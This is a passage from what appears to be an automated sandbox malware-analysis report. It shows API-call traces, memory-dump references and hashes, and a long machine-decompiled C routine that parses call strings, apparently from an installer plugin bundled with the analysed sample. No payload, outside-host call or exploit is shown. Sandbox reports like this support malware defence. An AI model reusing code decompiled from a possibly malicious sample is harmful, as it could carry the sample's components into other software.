                                                                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(?,0040E8C0), ref: 00405E96
                                                                                                                                                                            • SHGetPathFromIDListA.SHELL32(0040E8C0,Call), ref: 00405EA4
                                                                                                                                                                            • CoTaskMemFree.OLE32(0040E8C0), ref: 00405EAF
                                                                                                                                                                            • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405ED1
                                                                                                                                                                            • lstrlenA.KERNEL32(Call,?,0041F4E8,00000000,00404F4A,0041F4E8,00000000), ref: 00405F23
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                                                            • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$tp
                                                                                                                                                                            • API String ID: 900638850-1612357440
                                                                                                                                                                            • Opcode ID: fb8208971b7bef3eab874112c295b4c22afd955e6dbc7abb81a1d2e78964ecc6
                                                                                                                                                                            • Instruction ID: 70d043a0125fa0970afc212ad974551980140434863585fcf13b89b4fbf53fe2
                                                                                                                                                                            • Opcode Fuzzy Hash: fb8208971b7bef3eab874112c295b4c22afd955e6dbc7abb81a1d2e78964ecc6
                                                                                                                                                                            • Instruction Fuzzy Hash: AD61F471A04A01ABDF205F64DC88B7F3BA8DB41305F50803BE941B62D0D27D4A82DF5E
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                            			E10001A5D() {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				CHAR* _v24;
                                                                                                                                                                            				CHAR* _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				CHAR* _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				void* _v52;
                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                            				CHAR* _t198;
                                                                                                                                                                            				signed int _t201;
                                                                                                                                                                            				void* _t203;
                                                                                                                                                                            				void* _t205;
                                                                                                                                                                            				CHAR* _t207;
                                                                                                                                                                            				void* _t215;
                                                                                                                                                                            				struct HINSTANCE__* _t216;
                                                                                                                                                                            				struct HINSTANCE__* _t217;
                                                                                                                                                                            				struct HINSTANCE__* _t219;
                                                                                                                                                                            				signed short _t221;
                                                                                                                                                                            				struct HINSTANCE__* _t224;
                                                                                                                                                                            				struct HINSTANCE__* _t226;
                                                                                                                                                                            				void* _t227;
                                                                                                                                                                            				char* _t228;
                                                                                                                                                                            				void* _t239;
                                                                                                                                                                            				signed char _t240;
                                                                                                                                                                            				signed int _t241;
                                                                                                                                                                            				void* _t245;
                                                                                                                                                                            				struct HINSTANCE__* _t247;
                                                                                                                                                                            				void* _t248;
                                                                                                                                                                            				signed int _t250;
                                                                                                                                                                            				signed int _t252;
                                                                                                                                                                            				signed int _t258;
                                                                                                                                                                            				void* _t259;
                                                                                                                                                                            				signed int _t262;
                                                                                                                                                                            				signed int _t265;
                                                                                                                                                                            				signed int _t266;
                                                                                                                                                                            				signed int _t271;
                                                                                                                                                                            				signed int _t272;
                                                                                                                                                                            				signed int _t273;
                                                                                                                                                                            				signed int _t274;
                                                                                                                                                                            				void* _t277;
                                                                                                                                                                            				void* _t281;
                                                                                                                                                                            				struct HINSTANCE__* _t283;
                                                                                                                                                                            				signed char _t286;
                                                                                                                                                                            				void _t287;
                                                                                                                                                                            				signed int _t288;
                                                                                                                                                                            				signed int _t300;
                                                                                                                                                                            				signed int _t301;
                                                                                                                                                                            				signed char _t307;
                                                                                                                                                                            				signed int _t308;
                                                                                                                                                                            				CHAR* _t309;
                                                                                                                                                                            				CHAR* _t311;
                                                                                                                                                                            				CHAR* _t312;
                                                                                                                                                                            				struct HINSTANCE__* _t313;
                                                                                                                                                                            				void* _t315;
                                                                                                                                                                            				signed int _t316;
                                                                                                                                                                            				void* _t317;
                                                                                                                                                                            
                                                                                                                                                                            				_t283 = 0;
                                                                                                                                                                            				_v32 = 0;
                                                                                                                                                                            				_v36 = 0;
                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                            				_v40 = 0;
                                                                                                                                                                            				_t317 = 0;
                                                                                                                                                                            				_v48 = 0;
                                                                                                                                                                            				_t198 = E10001215();
                                                                                                                                                                            				_v24 = _t198;
                                                                                                                                                                            				_v28 = _t198;
                                                                                                                                                                            				_v44 = E10001215();
                                                                                                                                                                            				_t308 = E1000123B();
                                                                                                                                                                            				_v52 = _t308;
                                                                                                                                                                            				_v12 = _t308;
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					_t201 = _v32;
                                                                                                                                                                            					_v56 = _t201;
                                                                                                                                                                            					if(_t201 != _t283 && _t317 == _t283) {
                                                                                                                                                                            						break;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t307 =  *_t308;
                                                                                                                                                                            					_t286 = _t307;
                                                                                                                                                                            					_t203 = _t286 - _t283;
                                                                                                                                                                            					if(_t203 == 0) {
                                                                                                                                                                            						_t33 =  &_v32;
                                                                                                                                                                            						 *_t33 = _v32 | 0xffffffff;
                                                                                                                                                                            						__eflags =  *_t33;
                                                                                                                                                                            						L17:
                                                                                                                                                                            						_t205 = _v56 - _t283;
                                                                                                                                                                            						if(_t205 == 0) {
                                                                                                                                                                            							 *_v28 =  *_v28 & 0x00000000;
                                                                                                                                                                            							__eflags = _t317 - _t283;
                                                                                                                                                                            							if(_t317 == _t283) {
                                                                                                                                                                            								_t245 = GlobalAlloc(0x40, 0x14a4); // executed
                                                                                                                                                                            								_t317 = _t245;
                                                                                                                                                                            								 *(_t317 + 0x810) = _t283;
                                                                                                                                                                            								 *(_t317 + 0x814) = _t283;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t287 = _v36;
                                                                                                                                                                            							_t43 = _t317 + 8; // 0x8
                                                                                                                                                                            							_t207 = _t43;
                                                                                                                                                                            							_t44 = _t317 + 0x408; // 0x408
                                                                                                                                                                            							_t309 = _t44;
                                                                                                                                                                            							 *_t317 = _t287;
                                                                                                                                                                            							 *_t207 =  *_t207 & 0x00000000;
                                                                                                                                                                            							 *(_t317 + 0x808) = _t283;
                                                                                                                                                                            							 *_t309 =  *_t309 & 0x00000000;
                                                                                                                                                                            							_t288 = _t287 - _t283;
                                                                                                                                                                            							__eflags = _t288;
                                                                                                                                                                            							 *(_t317 + 0x80c) = _t283;
                                                                                                                                                                            							 *(_t317 + 4) = _t283;
                                                                                                                                                                            							if(_t288 == 0) {
                                                                                                                                                                            								__eflags = _v28 - _v24;
                                                                                                                                                                            								if(_v28 == _v24) {
                                                                                                                                                                            									goto L39;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t315 = 0;
                                                                                                                                                                            								GlobalFree(_t317);
                                                                                                                                                                            								_t317 = E100012FE(_v24);
                                                                                                                                                                            								__eflags = _t317 - _t283;
                                                                                                                                                                            								if(_t317 == _t283) {
                                                                                                                                                                            									goto L39;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									goto L32;
                                                                                                                                                                            								}
                                                                                                                                                                            								while(1) {
                                                                                                                                                                            									L32:
                                                                                                                                                                            									_t239 =  *(_t317 + 0x14a0);
                                                                                                                                                                            									__eflags = _t239 - _t283;
                                                                                                                                                                            									if(_t239 == _t283) {
                                                                                                                                                                            										break;
                                                                                                                                                                            									}
                                                                                                                                                                            									_t315 = _t317;
                                                                                                                                                                            									_t317 = _t239;
                                                                                                                                                                            									__eflags = _t317 - _t283;
                                                                                                                                                                            									if(_t317 != _t283) {
                                                                                                                                                                            										continue;
                                                                                                                                                                            									}
                                                                                                                                                                            									break;
                                                                                                                                                                            								}
                                                                                                                                                                            								__eflags = _t315 - _t283;
                                                                                                                                                                            								if(_t315 != _t283) {
                                                                                                                                                                            									 *(_t315 + 0x14a0) = _t283;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t240 =  *(_t317 + 0x810);
                                                                                                                                                                            								__eflags = _t240 & 0x00000008;
                                                                                                                                                                            								if((_t240 & 0x00000008) == 0) {
                                                                                                                                                                            									_t241 = _t240 | 0x00000002;
                                                                                                                                                                            									__eflags = _t241;
                                                                                                                                                                            									 *(_t317 + 0x810) = _t241;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t317 = E10001534(_t317);
                                                                                                                                                                            									 *(_t317 + 0x810) =  *(_t317 + 0x810) & 0xfffffff5;
                                                                                                                                                                            								}
                                                                                                                                                                            								goto L39;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t300 = _t288 - 1;
                                                                                                                                                                            								__eflags = _t300;
                                                                                                                                                                            								if(_t300 == 0) {
                                                                                                                                                                            									L28:
                                                                                                                                                                            									lstrcpyA(_t207, _v44);
                                                                                                                                                                            									L29:
                                                                                                                                                                            									lstrcpyA(_t309, _v24);
                                                                                                                                                                            									L39:
                                                                                                                                                                            									_v12 = _v12 + 1;
                                                                                                                                                                            									_v28 = _v24;
                                                                                                                                                                            									L63:
                                                                                                                                                                            									if(_v32 != 0xffffffff) {
                                                                                                                                                                            										_t308 = _v12;
                                                                                                                                                                            										continue;
                                                                                                                                                                            									}
                                                                                                                                                                            									break;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t301 = _t300 - 1;
                                                                                                                                                                            								__eflags = _t301;
                                                                                                                                                                            								if(_t301 == 0) {
                                                                                                                                                                            									goto L29;
                                                                                                                                                                            								}
                                                                                                                                                                            								__eflags = _t301 != 1;
                                                                                                                                                                            								if(_t301 != 1) {
                                                                                                                                                                            									goto L39;
                                                                                                                                                                            								}
                                                                                                                                                                            								goto L28;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t205 != 1) {
                                                                                                                                                                            							goto L39;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t247 = _v16;
                                                                                                                                                                            						if(_v40 == _t283) {
                                                                                                                                                                            							_t247 = _t247 - 1;
                                                                                                                                                                            						}
                                                                                                                                                                            						 *(_t317 + 0x814) = _t247;
                                                                                                                                                                            						goto L39;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t248 = _t203 - 0x23;
                                                                                                                                                                            					if(_t248 == 0) {
                                                                                                                                                                            						__eflags = _t308 - _v52;
                                                                                                                                                                            						if(_t308 <= _v52) {
                                                                                                                                                                            							L15:
                                                                                                                                                                            							_v32 = _t283;
                                                                                                                                                                            							_v36 = _t283;
                                                                                                                                                                            							goto L17;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags =  *((char*)(_t308 - 1)) - 0x3a;
                                                                                                                                                                            						if( *((char*)(_t308 - 1)) != 0x3a) {
                                                                                                                                                                            							goto L15;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _v32 - _t283;
                                                                                                                                                                            						if(_v32 == _t283) {
                                                                                                                                                                            							L40:
                                                                                                                                                                            							_t250 = _v32 - _t283;
                                                                                                                                                                            							__eflags = _t250;
                                                                                                                                                                            							if(_t250 == 0) {
                                                                                                                                                                            								__eflags = _t307 - 0x2a;
                                                                                                                                                                            								if(_t307 == 0x2a) {
                                                                                                                                                                            									_v36 = 2;
                                                                                                                                                                            									L61:
                                                                                                                                                                            									_t308 = _v12;
                                                                                                                                                                            									_v28 = _v24;
                                                                                                                                                                            									_t283 = 0;
                                                                                                                                                                            									__eflags = 0;
                                                                                                                                                                            									L62:
                                                                                                                                                                            									_t316 = _t308 + 1;
                                                                                                                                                                            									__eflags = _t316;
                                                                                                                                                                            									_v12 = _t316;
                                                                                                                                                                            									goto L63;
                                                                                                                                                                            								}
                                                                                                                                                                            								__eflags = _t307 - 0x2d;
                                                                                                                                                                            								if(_t307 == 0x2d) {
                                                                                                                                                                            									L132:
                                                                                                                                                                            									_t252 = _t308 + 1;
                                                                                                                                                                            									__eflags =  *_t252 - 0x3e;
                                                                                                                                                                            									if( *_t252 != 0x3e) {
                                                                                                                                                                            										L134:
                                                                                                                                                                            										_t252 = _t308 + 1;
                                                                                                                                                                            										__eflags =  *_t252 - 0x3a;
                                                                                                                                                                            										if( *_t252 != 0x3a) {
                                                                                                                                                                            											L141:
                                                                                                                                                                            											_v28 =  &(_v28[1]);
                                                                                                                                                                            											 *_v28 = _t307;
                                                                                                                                                                            											goto L62;
                                                                                                                                                                            										}
                                                                                                                                                                            										__eflags = _t307 - 0x2d;
                                                                                                                                                                            										if(_t307 == 0x2d) {
                                                                                                                                                                            											goto L141;
                                                                                                                                                                            										}
                                                                                                                                                                            										_v36 = 1;
                                                                                                                                                                            										L137:
                                                                                                                                                                            										_v12 = _t252;
                                                                                                                                                                            										__eflags = _v28 - _v24;
                                                                                                                                                                            										if(_v28 <= _v24) {
                                                                                                                                                                            											 *_v44 =  *_v44 & 0x00000000;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											 *_v28 =  *_v28 & 0x00000000;
                                                                                                                                                                            											lstrcpyA(_v44, _v24);
                                                                                                                                                                            										}
                                                                                                                                                                            										goto L61;
                                                                                                                                                                            									}
                                                                                                                                                                            									_v36 = 3;
                                                                                                                                                                            									goto L137;
                                                                                                                                                                            								}
                                                                                                                                                                            								__eflags = _t307 - 0x3a;
                                                                                                                                                                            								if(_t307 != 0x3a) {
                                                                                                                                                                            									goto L141;
                                                                                                                                                                            								}
                                                                                                                                                                            								__eflags = _t307 - 0x2d;
                                                                                                                                                                            								if(_t307 != 0x2d) {
                                                                                                                                                                            									goto L134;
                                                                                                                                                                            								}
                                                                                                                                                                            								goto L132;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t258 = _t250 - 1;
                                                                                                                                                                            							__eflags = _t258;
                                                                                                                                                                            							if(_t258 == 0) {
                                                                                                                                                                            								L74:
                                                                                                                                                                            								_t259 = _t286 - 0x22;
                                                                                                                                                                            								__eflags = _t259 - 0x55;
                                                                                                                                                                            								if(_t259 > 0x55) {
                                                                                                                                                                            									goto L61;
                                                                                                                                                                            								}
                                                                                                                                                                            								switch( *((intOrPtr*)(( *(_t259 + 0x1000215a) & 0x000000ff) * 4 +  &M100020F6))) {
                                                                                                                                                                            									case 0:
                                                                                                                                                                            										__eax = _v24;
                                                                                                                                                                            										__edi = _v12;
                                                                                                                                                                            										while(1) {
                                                                                                                                                                            											__edi = __edi + 1;
                                                                                                                                                                            											_v12 = __edi;
                                                                                                                                                                            											__cl =  *__edi;
                                                                                                                                                                            											__eflags = __cl - __dl;
                                                                                                                                                                            											if(__cl != __dl) {
                                                                                                                                                                            												goto L116;
                                                                                                                                                                            											}
                                                                                                                                                                            											L115:
                                                                                                                                                                            											__eflags =  *(__edi + 1) - __dl;
                                                                                                                                                                            											if( *(__edi + 1) != __dl) {
                                                                                                                                                                            												L120:
                                                                                                                                                                            												 *__eax =  *__eax & 0x00000000;
                                                                                                                                                                            												__ebx = E10001224(_v24);
                                                                                                                                                                            												goto L91;
                                                                                                                                                                            											}
                                                                                                                                                                            											L116:
                                                                                                                                                                            											__eflags = __cl;
                                                                                                                                                                            											if(__cl == 0) {
                                                                                                                                                                            												goto L120;
                                                                                                                                                                            											}
                                                                                                                                                                            											__eflags = __cl - __dl;
                                                                                                                                                                            											if(__cl == __dl) {
                                                                                                                                                                            												__edi = __edi + 1;
                                                                                                                                                                            												__eflags = __edi;
                                                                                                                                                                            											}
                                                                                                                                                                            											__cl =  *__edi;
                                                                                                                                                                            											 *__eax =  *__edi;
                                                                                                                                                                            											__eax = __eax + 1;
                                                                                                                                                                            											__edi = __edi + 1;
                                                                                                                                                                            											_v12 = __edi;
                                                                                                                                                                            											__cl =  *__edi;
                                                                                                                                                                            											__eflags = __cl - __dl;
                                                                                                                                                                            											if(__cl != __dl) {
                                                                                                                                                                            												goto L116;
                                                                                                                                                                            											}
                                                                                                                                                                            											goto L115;
                                                                                                                                                                            										}
                                                                                                                                                                            									case 1:
                                                                                                                                                                            										_v8 = 1;
                                                                                                                                                                            										goto L61;
                                                                                                                                                                            									case 2:
                                                                                                                                                                            										_v8 = _v8 | 0xffffffff;
                                                                                                                                                                            										goto L61;
                                                                                                                                                                            									case 3:
                                                                                                                                                                            										_v8 = _v8 & 0x00000000;
                                                                                                                                                                            										_v20 = _v20 & 0x00000000;
                                                                                                                                                                            										_v16 = _v16 + 1;
                                                                                                                                                                            										goto L79;
                                                                                                                                                                            									case 4:
                                                                                                                                                                            										__eflags = _v20;
                                                                                                                                                                            										if(_v20 != 0) {
                                                                                                                                                                            											goto L61;
                                                                                                                                                                            										}
                                                                                                                                                                            										_v12 = _v12 - 1;
                                                                                                                                                                            										__ebx = E10001215();
                                                                                                                                                                            										 &_v12 = E100019FB( &_v12);
                                                                                                                                                                            										__eax = E10001429(__edx, __eax, __edx, __ebx);
                                                                                                                                                                            										goto L91;
                                                                                                                                                                            									case 5:
                                                                                                                                                                            										L99:
                                                                                                                                                                            										_v20 = _v20 + 1;
                                                                                                                                                                            										goto L61;
                                                                                                                                                                            									case 6:
                                                                                                                                                                            										_push(7);
                                                                                                                                                                            										goto L107;
                                                                                                                                                                            									case 7:
                                                                                                                                                                            										_push(0x19);
                                                                                                                                                                            										goto L127;
                                                                                                                                                                            									case 8:
                                                                                                                                                                            										_push(0x15);
                                                                                                                                                                            										goto L127;
                                                                                                                                                                            									case 9:
                                                                                                                                                                            										_push(0x16);
                                                                                                                                                                            										goto L127;
                                                                                                                                                                            									case 0xa:
                                                                                                                                                                            										_push(0x18);
                                                                                                                                                                            										goto L127;
                                                                                                                                                                            									case 0xb:
                                                                                                                                                                            										_push(5);
                                                                                                                                                                            										goto L107;
                                                                                                                                                                            									case 0xc:
                                                                                                                                                                            										__eax = 0;
                                                                                                                                                                            										__eax = 1;
                                                                                                                                                                            										goto L85;
                                                                                                                                                                            									case 0xd:
                                                                                                                                                                            										_push(6);
                                                                                                                                                                            										goto L107;
                                                                                                                                                                            									case 0xe:
                                                                                                                                                                            										_push(2);
                                                                                                                                                                            										goto L107;
                                                                                                                                                                            									case 0xf:
                                                                                                                                                                            										_push(3);
                                                                                                                                                                            										goto L107;
                                                                                                                                                                            									case 0x10:
                                                                                                                                                                            										_push(0x17);
                                                                                                                                                                            										L127:
                                                                                                                                                                            										_pop(__ebx);
                                                                                                                                                                            										goto L92;
                                                                                                                                                                            									case 0x11:
                                                                                                                                                                            										__eax =  &_v12;
                                                                                                                                                                            										__eax = E100019FB( &_v12);
                                                                                                                                                                            										__ebx = __eax;
                                                                                                                                                                            										__ebx = __eax + 1;
                                                                                                                                                                            										__eflags = __ebx - 0xb;
                                                                                                                                                                            										if(__ebx < 0xb) {
                                                                                                                                                                            											__ebx = __ebx + 0xa;
                                                                                                                                                                            										}
                                                                                                                                                                            										goto L91;
                                                                                                                                                                            									case 0x12:
                                                                                                                                                                            										__ebx = 0xffffffff;
                                                                                                                                                                            										goto L92;
                                                                                                                                                                            									case 0x13:
                                                                                                                                                                            										_v48 = _v48 + 1;
                                                                                                                                                                            										_push(3);
                                                                                                                                                                            										_pop(__eax);
                                                                                                                                                                            										goto L85;
                                                                                                                                                                            									case 0x14:
                                                                                                                                                                            										__eax = 0;
                                                                                                                                                                            										__eflags = 0;
                                                                                                                                                                            										goto L85;
                                                                                                                                                                            									case 0x15:
                                                                                                                                                                            										_push(4);
                                                                                                                                                                            										L107:
                                                                                                                                                                            										_pop(__eax);
                                                                                                                                                                            										L85:
                                                                                                                                                                            										__edi = _v16;
                                                                                                                                                                            										__ecx =  *(0x1000305c + __eax * 4);
                                                                                                                                                                            										__edi = _v16 << 5;
                                                                                                                                                                            										__edx = 0;
                                                                                                                                                                            										__edi = (_v16 << 5) + __esi;
                                                                                                                                                                            										__edx = 1;
                                                                                                                                                                            										__eflags = _v8 - 0xffffffff;
                                                                                                                                                                            										_v40 = 1;
                                                                                                                                                                            										 *(__edi + 0x818) = __eax;
                                                                                                                                                                            										if(_v8 == 0xffffffff) {
                                                                                                                                                                            											L87:
                                                                                                                                                                            											__ecx = __edx;
                                                                                                                                                                            											L88:
                                                                                                                                                                            											__eflags = _v8 - __edx;
                                                                                                                                                                            											 *(__edi + 0x828) = __ecx;
                                                                                                                                                                            											if(_v8 == __edx) {
                                                                                                                                                                            												__eax =  &_v12;
                                                                                                                                                                            												__eax = E100019FB( &_v12);
                                                                                                                                                                            												__eax = __eax + 1;
                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                            												_v8 = __eax;
                                                                                                                                                                            											}
                                                                                                                                                                            											__eax = _v8;
                                                                                                                                                                            											 *((intOrPtr*)(__edi + 0x81c)) = _v8;
                                                                                                                                                                            											_t133 = _v16 + 0x41; // 0x41
                                                                                                                                                                            											_t133 = _t133 << 5;
                                                                                                                                                                            											__eax = 0;
                                                                                                                                                                            											__eflags = 0;
                                                                                                                                                                            											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
                                                                                                                                                                            											 *((intOrPtr*)(__edi + 0x830)) = 0;
                                                                                                                                                                            											 *((intOrPtr*)(__edi + 0x82c)) = 0;
                                                                                                                                                                            											goto L91;
                                                                                                                                                                            										}
                                                                                                                                                                            										__eflags = __ecx;
                                                                                                                                                                            										if(__ecx > 0) {
                                                                                                                                                                            											goto L88;
                                                                                                                                                                            										}
                                                                                                                                                                            										goto L87;
                                                                                                                                                                            									case 0x16:
                                                                                                                                                                            										_t261 =  *(_t317 + 0x814);
                                                                                                                                                                            										__eflags = _t261 - _v16;
                                                                                                                                                                            										if(_t261 > _v16) {
                                                                                                                                                                            											_v16 = _t261;
                                                                                                                                                                            										}
                                                                                                                                                                            										_v8 = _v8 & 0x00000000;
                                                                                                                                                                            										_v20 = _v20 & 0x00000000;
                                                                                                                                                                            										_v36 - 3 = _t261 - (_v36 == 3);
                                                                                                                                                                            										if(_t261 != _v36 == 3) {
                                                                                                                                                                            											L79:
                                                                                                                                                                            											_v40 = 1;
                                                                                                                                                                            										}
                                                                                                                                                                            										goto L61;
                                                                                                                                                                            									case 0x17:
                                                                                                                                                                            										__eax =  &_v12;
                                                                                                                                                                            										__eax = E100019FB( &_v12);
                                                                                                                                                                            										__ebx = __eax;
                                                                                                                                                                            										__ebx = __eax + 1;
                                                                                                                                                                            										L91:
                                                                                                                                                                            										__eflags = __ebx;
                                                                                                                                                                            										if(__ebx == 0) {
                                                                                                                                                                            											goto L61;
                                                                                                                                                                            										}
                                                                                                                                                                            										L92:
                                                                                                                                                                            										__eflags = _v20;
                                                                                                                                                                            										_v40 = 1;
                                                                                                                                                                            										if(_v20 != 0) {
                                                                                                                                                                            											L97:
                                                                                                                                                                            											__eflags = _v20 - 1;
                                                                                                                                                                            											if(_v20 == 1) {
                                                                                                                                                                            												__eax = _v16;
                                                                                                                                                                            												__eax = _v16 << 5;
                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                            												 *(__eax + __esi + 0x82c) = __ebx;
                                                                                                                                                                            											}
                                                                                                                                                                            											goto L99;
                                                                                                                                                                            										}
                                                                                                                                                                            										_v16 = _v16 << 5;
                                                                                                                                                                            										_t141 = __esi + 0x830; // 0x830
                                                                                                                                                                            										__edi = (_v16 << 5) + _t141;
                                                                                                                                                                            										__eax =  *__edi;
                                                                                                                                                                            										__eflags = __eax - 0xffffffff;
                                                                                                                                                                            										if(__eax <= 0xffffffff) {
                                                                                                                                                                            											L95:
                                                                                                                                                                            											__eax = GlobalFree(__eax);
                                                                                                                                                                            											L96:
                                                                                                                                                                            											 *__edi = __ebx;
                                                                                                                                                                            											goto L97;
                                                                                                                                                                            										}
                                                                                                                                                                            										__eflags = __eax - 0x19;
                                                                                                                                                                            										if(__eax <= 0x19) {
                                                                                                                                                                            											goto L96;
                                                                                                                                                                            										}
                                                                                                                                                                            										goto L95;
                                                                                                                                                                            									case 0x18:
                                                                                                                                                                            										goto L61;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							_t262 = _t258 - 1;
                                                                                                                                                                            							__eflags = _t262;
                                                                                                                                                                            							if(_t262 == 0) {
                                                                                                                                                                            								_v16 = _t283;
                                                                                                                                                                            								goto L74;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _t262 != 1;
                                                                                                                                                                            							if(_t262 != 1) {
                                                                                                                                                                            								goto L141;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t265 = _t286 - 0x21;
                                                                                                                                                                            							__eflags = _t265;
                                                                                                                                                                            							if(_t265 == 0) {
                                                                                                                                                                            								_v8 =  ~_v8;
                                                                                                                                                                            								goto L61;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t266 = _t265 - 0x42;
                                                                                                                                                                            							__eflags = _t266;
                                                                                                                                                                            							if(_t266 == 0) {
                                                                                                                                                                            								L57:
                                                                                                                                                                            								__eflags = _v8 - 1;
                                                                                                                                                                            								if(_v8 != 1) {
                                                                                                                                                                            									_t92 = _t317 + 0x810;
                                                                                                                                                                            									 *_t92 =  *(_t317 + 0x810) &  !0x00000001;
                                                                                                                                                                            									__eflags =  *_t92;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									 *(_t317 + 0x810) =  *(_t317 + 0x810) | 1;
                                                                                                                                                                            								}
                                                                                                                                                                            								_v8 = 1;
                                                                                                                                                                            								goto L61;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t271 = _t266;
                                                                                                                                                                            							__eflags = _t271;
                                                                                                                                                                            							if(_t271 == 0) {
                                                                                                                                                                            								_push(0x20);
                                                                                                                                                                            								L56:
                                                                                                                                                                            								_pop(1);
                                                                                                                                                                            								goto L57;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t272 = _t271 - 9;
                                                                                                                                                                            							__eflags = _t272;
                                                                                                                                                                            							if(_t272 == 0) {
                                                                                                                                                                            								_push(8);
                                                                                                                                                                            								goto L56;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t273 = _t272 - 4;
                                                                                                                                                                            							__eflags = _t273;
                                                                                                                                                                            							if(_t273 == 0) {
                                                                                                                                                                            								_push(4);
                                                                                                                                                                            								goto L56;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t274 = _t273 - 1;
                                                                                                                                                                            							__eflags = _t274;
                                                                                                                                                                            							if(_t274 == 0) {
                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                            								goto L56;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _t274 != 0;
                                                                                                                                                                            							if(_t274 != 0) {
                                                                                                                                                                            								goto L61;
                                                                                                                                                                            							}
                                                                                                                                                                            							_push(0x40);
                                                                                                                                                                            							goto L56;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L15;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t277 = _t248 - 5;
                                                                                                                                                                            					if(_t277 == 0) {
                                                                                                                                                                            						__eflags = _v36 - 3;
                                                                                                                                                                            						_v32 = 1;
                                                                                                                                                                            						_v8 = _t283;
                                                                                                                                                                            						_v20 = _t283;
                                                                                                                                                                            						_v16 = (0 | _v36 == 0x00000003) + 1;
                                                                                                                                                                            						_v40 = _t283;
                                                                                                                                                                            						goto L17;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t281 = _t277 - 1;
                                                                                                                                                                            					if(_t281 == 0) {
                                                                                                                                                                            						_v32 = 2;
                                                                                                                                                                            						_v8 = _t283;
                                                                                                                                                                            						_v20 = _t283;
                                                                                                                                                                            						goto L17;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t281 != 0x16) {
                                                                                                                                                                            						goto L40;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_v32 = 3;
                                                                                                                                                                            						_v8 = 1;
                                                                                                                                                                            						goto L17;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				GlobalFree(_v52);
                                                                                                                                                                            				GlobalFree(_v24);
                                                                                                                                                                            				GlobalFree(_v44);
                                                                                                                                                                            				if(_t317 == _t283 ||  *(_t317 + 0x80c) != _t283) {
                                                                                                                                                                            					L161:
                                                                                                                                                                            					return _t317;
                                                                                                                                                                            				} else {
